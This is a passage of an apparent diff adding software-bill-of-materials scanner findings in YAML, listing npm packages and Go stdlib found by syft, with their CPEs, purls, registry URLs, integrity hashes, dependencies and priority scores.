dependencies: + call-bound: ^1.0.2 + es-errors: ^1.3.0 + get-intrinsic: ^1.2.5 + object-inspect: ^1.13.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6c276e4fe79d17b1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: side-channel-weakmap 1.0.2' + title: side-channel-weakmap 1.0.2 + description: 'Package discovered: side-channel-weakmap 1.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3a35b0f8b53bc97a + name: side-channel-weakmap + version: 1.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:side-channel-weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side-channel-weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel_weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel_weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side-channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side-channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side:side-channel-weakmap:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side:side_channel_weakmap:1.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/side-channel-weakmap@1.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/side-channel-weakmap/-/side-channel-weakmap-1.0.2.tgz + integrity: sha512-WPS/HvHQTYnHisLo9McqBHOJk2FkHO/tlpvldyrnem4aeQp4hai3gythswg6p01oSoTl58rcpiFAjF2br2Ak2A== + dependencies: + call-bound: ^1.0.2 + es-errors: ^1.3.0 + get-intrinsic: ^1.2.5 + object-inspect: ^1.13.3 + side-channel-map: ^1.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8acef3cde3b7b132 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: signal-exit 4.1.0' + title: signal-exit 4.1.0 + description: 'Package discovered: signal-exit 4.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a63ea3d2efb32143 + name: signal-exit + version: 4.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:signal-exit:signal-exit:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:signal-exit:signal_exit:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:signal_exit:signal-exit:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:signal_exit:signal_exit:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:signal:signal-exit:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:signal:signal_exit:4.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/signal-exit@4.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz + integrity: sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9476a789ac7d80fb + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: simple-swizzle 0.2.4' + title: simple-swizzle 0.2.4 + description: 'Package discovered: simple-swizzle 0.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: cef7b2b2b70b3db8 + name: simple-swizzle + version: 0.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:simple-swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:simple-swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:simple_swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:simple_swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:simple:simple-swizzle:0.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:simple:simple_swizzle:0.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/simple-swizzle@0.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/simple-swizzle/-/simple-swizzle-0.2.4.tgz + integrity: sha512-nAu1WFPQSMNr2Zn9PGSZK9AGn4t/y97lEm+MXTtUDwfP0ksAIX4nO+6ruD9Jwut4C49SB1Ws+fbXsm/yScWOHw== + dependencies: + is-arrayish: ^0.3.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ff9098f7bbabdf5b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: socket.io 4.8.3' + title: socket.io 4.8.3 + description: 'Package discovered: socket.io 4.8.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5cc521e50bb4314d + name: socket.io + version: 4.8.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:socket:socket.io:4.8.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/socket.io@4.8.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/socket.io/-/socket.io-4.8.3.tgz + integrity: sha512-2Dd78bqzzjE6KPkD5fHZmDAKRNe3J15q+YHDrIsy9WEkqttc7GY+kT9OBLSMaPbQaEd0x1BjcmtMtXkfpc+T5A== + dependencies: + accepts: ~1.3.4 + base64id: ~2.0.0 + cors: ~2.8.5 + debug: ~4.4.1 + engine.io: ~6.6.0 + socket.io-adapter: ~2.5.2 + socket.io-parser: ~4.2.4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a08d32cd24a38070 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: socket.io-adapter 2.5.6' + title: socket.io-adapter 2.5.6 + description: 'Package discovered: socket.io-adapter 2.5.6' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 423a38d81e2dc8e3 + name: socket.io-adapter + version: 2.5.6 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:socket.io-adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:socket.io-adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:socket.io_adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:socket.io_adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:socket.io:socket.io-adapter:2.5.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:socket.io:socket.io_adapter:2.5.6:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/socket.io-adapter@2.5.6 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.5.6.tgz + integrity: sha512-DkkO/dz7MGln0dHn5bmN3pPy+JmywNICWrJqVWiVOyvXjWQFIv9c2h24JrQLLFJ2aQVQf/Cvl1vblnd4r2apLQ== + dependencies: + debug: ~4.4.1 + ws: ~8.18.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 126bbc6e6f7db2d9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: socket.io-client 4.8.3' + title: socket.io-client 4.8.3 + description: 'Package discovered: socket.io-client 4.8.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ecd3152d103ea0f9 + name: socket.io-client + version: 4.8.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:socket.io-client:socket.io-client:4.8.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:socket.io-client:socket.io_client:4.8.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:socket.io_client:socket.io-client:4.8.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:socket.io_client:socket.io_client:4.8.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:socket.io:socket.io-client:4.8.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:socket.io:socket.io_client:4.8.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/socket.io-client@4.8.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/socket.io-client/-/socket.io-client-4.8.3.tgz + integrity: sha512-uP0bpjWrjQmUt5DTHq9RuoCBdFJF10cdX9X+a368j/Ft0wmaVgxlrjvK3kjvgCODOMMOz9lcaRzxmso0bTWZ/g== + dependencies: + '@socket.io/component-emitter': ~3.1.0 + debug: ~4.4.1 + engine.io-client: ~6.6.1 + socket.io-parser: ~4.2.4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4e07aea60237064a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: socket.io-parser 4.2.6' + title: socket.io-parser 4.2.6 + description: 'Package discovered: socket.io-parser 4.2.6' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f9190921d6308e46 + name: socket.io-parser + version: 4.2.6 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:socket:socket.io-parser:4.2.6:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/socket.io-parser@4.2.6 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/socket.io-parser/-/socket.io-parser-4.2.6.tgz + integrity: sha512-asJqbVBDsBCJx0pTqw3WfesSY0iRX+2xzWEWzrpcH7L6fLzrhyF8WPI8UaeM4YCuDfpwA/cgsdugMsmtz8EJeg== + dependencies: + '@socket.io/component-emitter': ~3.1.0 + debug: ~4.4.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1381d8de85a9f426 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: source-map-js 1.2.1' + title: source-map-js 1.2.1 + description: 'Package discovered: source-map-js 1.2.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ef14348a3e7aef73 + name: source-map-js + version: 1.2.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:source-map-js:source-map-js:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:source-map-js:source_map_js:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:source_map_js:source-map-js:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:source_map_js:source_map_js:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:source-map:source-map-js:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:source-map:source_map_js:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:source_map:source-map-js:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:source_map:source_map_js:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:source:source-map-js:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:source:source_map_js:1.2.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/source-map-js@1.2.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz + integrity: sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8a8949f600357d51 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: standard-as-callback 2.1.0' + title: standard-as-callback 2.1.0 + description: 'Package discovered: standard-as-callback 2.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ae42b44f62499323 + name: standard-as-callback + version: 2.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:standard-as-callback:standard-as-callback:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:standard-as-callback:standard_as_callback:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:standard_as_callback:standard-as-callback:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:standard_as_callback:standard_as_callback:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:standard-as:standard-as-callback:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:standard-as:standard_as_callback:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:standard_as:standard-as-callback:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:standard_as:standard_as_callback:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:standard:standard-as-callback:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:standard:standard_as_callback:2.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/standard-as-callback@2.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/standard-as-callback/-/standard-as-callback-2.1.0.tgz + integrity: sha512-qoRRSyROncaz1z0mvYqIE4lCd9p2R90i6GxW3uZv5ucSu8tU7B5HXUP1gG8pVZsYNVaXjk8ClXHPttLyxAL48A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4830d30cd7a05603 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: statuses 2.0.2' + title: statuses 2.0.2 + description: 'Package discovered: statuses 2.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7442cb30a409bd68 + name: statuses + version: 2.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:statuses:statuses:2.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/statuses@2.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/statuses/-/statuses-2.0.2.tgz + integrity: sha512-DvEy55V3DB7uknRo+4iOGT5fP1slR8wQohVdknigZPMpMstaKJQWhwiYBACJE3Ul2pTnATihhBYnRhZQHGBiRw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fce9dfc2e720150a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/@esbuild/darwin-arm64/bin/esbuild + startLine: 0 + message: 'Package discovered: stdlib go1.20.12' + title: stdlib go1.20.12 + description: 'Package discovered: stdlib go1.20.12' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 755a3e00c5f656c9 + name: stdlib + version: go1.20.12 + type: go-module + foundBy: go-module-binary-cataloger + locations: + - path: /node_modules/@esbuild/darwin-arm64/bin/esbuild + accessPath: /node_modules/@esbuild/darwin-arm64/bin/esbuild + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: [] + language: go + cpes: + - cpe: cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:* + source: syft-generated + purl: pkg:golang/stdlib@1.20.12 + metadataType: go-module-buildinfo-entry + metadata: + goCompiledVersion: go1.20.12 + architecture: '' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 684726e125b93b59 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/esbuild/bin/esbuild + startLine: 0 + message: 'Package discovered: stdlib go1.20.12' + title: stdlib go1.20.12 + description: 'Package discovered: stdlib go1.20.12' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e9a4a6eb4de31a0f + name: stdlib + version: go1.20.12 + type: go-module + foundBy: go-module-binary-cataloger + locations: + - path: /node_modules/esbuild/bin/esbuild + accessPath: /node_modules/esbuild/bin/esbuild + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: [] + language: go + cpes: + - cpe: cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:* + source: syft-generated + purl: pkg:golang/stdlib@1.20.12 + metadataType: go-module-buildinfo-entry + metadata: + goCompiledVersion: go1.20.12 + architecture: '' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 12c7b9072b4ac0c3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: stream-events 1.0.5' + title: stream-events 1.0.5 + description: 'Package discovered: stream-events 1.0.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d6075f31d1f26f1b + name: stream-events + version: 1.0.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:stream-events:stream-events:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:stream-events:stream_events:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:stream_events:stream-events:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:stream_events:stream_events:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:stream:stream-events:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:stream:stream_events:1.0.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/stream-events@1.0.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz + integrity: sha512-E1GUzBSgvct8Jsb3v2X15pjzN1tYebtbLaMg+eBOUOAxgbLoSbT2NS91ckc5lJD1KfLjId+jXJRgo0qnV5Nerg== + dependencies: + stubs: ^3.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 42a667b9f8ef2c86 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: stream-shift 1.0.3' + title: stream-shift 1.0.3 + description: 'Package discovered: stream-shift 1.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1acff9076c855611 + name: stream-shift + version: 1.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:stream-shift:stream-shift:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:stream-shift:stream_shift:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:stream_shift:stream-shift:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:stream_shift:stream_shift:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:stream:stream-shift:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:stream:stream_shift:1.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/stream-shift@1.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/stream-shift/-/stream-shift-1.0.3.tgz + integrity: sha512-76ORR0DO1o1hlKwTbi/DM3EXWGf3ZJYO8cXX5RJwnul2DEg2oyoZyjLNoQM8WsvZiFKCRfC1O0J7iCvie3RZmQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 89e93178704235e4 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: streamsearch 1.1.0' + title: streamsearch 1.1.0 + description: 'Package discovered: streamsearch 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c7163598759ab751 + name: streamsearch + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + 